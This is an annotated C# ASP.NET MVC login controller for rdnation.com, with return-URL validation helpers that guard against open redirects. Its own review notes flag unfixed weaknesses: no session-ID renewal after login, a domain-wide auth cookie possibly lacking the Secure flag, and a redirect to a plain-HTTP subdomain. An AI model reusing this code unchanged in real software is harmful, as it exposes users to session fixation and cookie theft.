/// <summary>
/// Handles the posted log-on form: checks the credentials, issues the forms-authentication
/// cookies and redirects the caller.
/// </summary>
/// <param name="model">Posted form values (e-mail, password, remember-me flag).</param>
/// <param name="returnUrl">Optional site-relative path to return to after a successful log-on.</param>
/// <returns>
/// A redirect on success; otherwise the log-on view redisplayed with <paramref name="model"/>.
/// </returns>
public ActionResult LogOn(LogOnModel model, string returnUrl)
{
    // If we got this far, something failed, redisplay form
    if (!ModelState.IsValid)
    {
        return View(model);
    }

    if (!Membership.ValidateUser(model.Email, model.Password))
    {
        ModelState.AddModelError("", "The user name or password provided is incorrect.");
        return View(model);
    }

    FormsAuthentication.SetAuthCookie(model.Email, model.RememberMe);

    // A second ticket cookie is issued with its Domain set to the second-level domain.
    // NOTE(review): it is created with createPersistentCookie = false regardless of
    // model.RememberMe, and its Secure flag is not set in this method (it depends on
    // forms-authentication configuration not shown here) - confirm both are intended.
    System.Web.HttpCookie domainCookie =
        System.Web.Security.FormsAuthentication.GetAuthCookie(model.Email, false);
    domainCookie.Domain = "rdnation.com"; // the second level domain name
    Response.AppendCookie(domainCookie);

    // Only a rooted, site-relative path is followed; "//" and "/\" prefixes are refused
    // in addition to the framework's own local-URL check.
    bool returnUrlIsLocalPath =
        Url.IsLocalUrl(returnUrl)
        && returnUrl.Length > 1
        && returnUrl.StartsWith("/")
        && !returnUrl.StartsWith("//")
        && !returnUrl.StartsWith("/\\");
    if (returnUrlIsLocalPath)
    {
        // NOTE(review): this path returns before Session["UserId"] is written below - confirm
        // that the session value is populated elsewhere for these requests.
        return Redirect(returnUrl);
    }

    var user = Membership.GetUser(model.Email);
    var userKey = (Guid)user.ProviderUserKey;

    // NOTE(review): the session identifier is not renewed in this method after a successful
    // log-on - confirm that is handled elsewhere.
    if (Session["UserId"] != null)
    {
        Session["UserId"] = userKey;
    }
    else
    {
        Session.Add("UserId", userKey);
    }

    return Redirect(ServerConfig.WEBSITE_DEFAULT_LOGIN_LOCATION);
}
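// NOTE(review): in the excerpt this attribute is followed by a stray "#endif" whose "#if" is
// not visible, and its original comment ("apply to all actions in controller") suggests it was
// taken from the controller declaration under a conditional-compilation guard. It is kept
// unconditionally here so the credential post is only served over HTTPS - confirm against the
// full file.
/// <summary>
/// Handles the posted login form: rejects banned e-mail domains, validates the credentials,
/// issues the authentication cookie, restores the shopping-cart session and redirects.
/// </summary>
/// <param name="model">Posted form values (e-mail, password, remember-me flag).</param>
/// <param name="returnSite">Optional site key ("league", "shops" or "zebras") to return to.</param>
/// <param name="returnUrl">
/// Optional return location. With <paramref name="returnSite"/> it is appended to that site's
/// base address; on its own it is followed only when it is a site-relative path or an
/// http/https address on rdnation.com or one of its sub-domains.
/// </param>
/// <returns>
/// A redirect on success; otherwise the login view redisplayed with <paramref name="model"/>.
/// </returns>
[RequireHttps]
public ActionResult Login(LogOnModel model, string returnSite, string returnUrl)
{
    try
    {
        var id = StoreGateway.GetShoppingCartId(HttpContext);
        if (ModelState.IsValid)
        {
            // Case-insensitive match so a different letter case does not slip past the ban.
            string[] bannedDomains = { "@163.com", "@tom.com", "@126.com" };
            foreach (string banned in bannedDomains)
            {
                if (model.Email.IndexOf(banned, StringComparison.OrdinalIgnoreCase) >= 0)
                {
                    ModelState.AddModelError("", "That Domain name has been banned from RDNation, if you think this is in Error, please contact us.");
                    return View(model);
                }
            }

            if (Membership.ValidateUser(model.Email, model.Password))
            {
                //forum.wftda.com
                //wftda.com/dashboard
                // Sign-ins by these accounts are recorded in the error log. The addresses are
                // redacted in the source listing; ten entries were compared.
                string[] auditedAccounts =
                {
                    "*****@*****.**", "*****@*****.**", "*****@*****.**", "*****@*****.**", "*****@*****.**",
                    "*****@*****.**", "*****@*****.**", "*****@*****.**", "*****@*****.**", "*****@*****.**"
                };
                if (Array.IndexOf(auditedAccounts, model.Email) >= 0)
                {
                    // Only the account name is recorded. The submitted password must never be
                    // written to a log or error store, where it would sit in plaintext.
                    ErrorDatabaseManager.AddException(new Exception(model.Email), GetType());
                }

                setCookie(model.Email, model.RememberMe);
                if (id != null)
                {
                    StoreGateway.SetShoppingCartSession(id.Value, HttpContext);
                }

                if (!String.IsNullOrEmpty(returnSite))
                {
                    if (returnSite == "league")
                    {
                        return Redirect(AppendReturnPath("https://league.rdnation.com", returnUrl));
                    }
                    if (returnSite == "shops")
                    {
                        return Redirect(AppendReturnPath(ServerConfig.WEBSITE_STORE_DEFAULT_LOCATION, returnUrl));
                    }
                    if (returnSite == "zebras")
                    {
                        // NOTE(review): plain-HTTP target. If setCookie issues a cookie scoped
                        // to the parent domain without the Secure flag, it would travel
                        // unencrypted - confirm whether this site can be served over HTTPS.
                        return Redirect(AppendReturnPath("http://zebras.rdnation.com", returnUrl));
                    }
                }
                else
                {
                    string safeReturnUrl;
                    if (TryGetSafeReturnUrl(returnUrl, out safeReturnUrl))
                    {
                        return Redirect(safeReturnUrl);
                    }
                }

                return Redirect("https://league.rdnation.com");
            }

            ModelState.AddModelError("", "The user name or password provided is incorrect.");
        }
    }
    catch (Exception e)
    {
        // Best effort: the failure is recorded and the form is redisplayed below.
        ErrorDatabaseManager.AddException(e, GetType());
    }

    // If we got this far, something failed, redisplay form
    return View(model);
}

// Accepts a caller-supplied return location only when it stays on this site or on rdnation.com.
// NOTE(review): any other host that must remain a valid return target has to be added here.
private bool TryGetSafeReturnUrl(string returnUrl, out string safeUrl)
{
    safeUrl = null;
    if (String.IsNullOrEmpty(returnUrl))
    {
        return false;
    }

    // Rooted, site-relative path.
    if (Url.IsLocalUrl(returnUrl)
        && returnUrl.StartsWith("/", StringComparison.Ordinal)
        && !returnUrl.StartsWith("//", StringComparison.Ordinal)
        && !returnUrl.StartsWith("/\\", StringComparison.Ordinal))
    {
        safeUrl = returnUrl;
        return true;
    }

    Uri target;
    if (!Uri.TryCreate(returnUrl, UriKind.Absolute, out target))
    {
        return false;
    }

    bool isWebScheme = target.Scheme == Uri.UriSchemeHttp || target.Scheme == Uri.UriSchemeHttps;
    bool isOwnHost = target.Host.Equals("rdnation.com", StringComparison.OrdinalIgnoreCase)
        || target.Host.EndsWith(".rdnation.com", StringComparison.OrdinalIgnoreCase);
    if (isWebScheme && isOwnHost && target.UserInfo.Length == 0)
    {
        // Redirect to the parsed form so the browser receives exactly what was checked.
        safeUrl = target.AbsoluteUri;
        return true;
    }

    return false;
}

// Appends returnUrl to baseUrl only when the result keeps baseUrl's scheme, host and port;
// otherwise returns baseUrl unchanged so the redirect cannot be pointed at another host.
// NOTE(review): assumes baseUrl is an absolute address; a relative one is returned as is.
private static string AppendReturnPath(string baseUrl, string returnUrl)
{
    if (String.IsNullOrEmpty(returnUrl))
    {
        return baseUrl;
    }

    Uri baseUri;
    Uri combined;
    if (Uri.TryCreate(baseUrl, UriKind.Absolute, out baseUri)
        && Uri.TryCreate(baseUrl + returnUrl, UriKind.Absolute, out combined)
        && combined.Scheme == baseUri.Scheme
        && combined.Port == baseUri.Port
        && combined.UserInfo.Length == 0
        && String.Equals(combined.Host, baseUri.Host, StringComparison.OrdinalIgnoreCase))
    {
        return combined.AbsoluteUri;
    }

    return baseUrl;
}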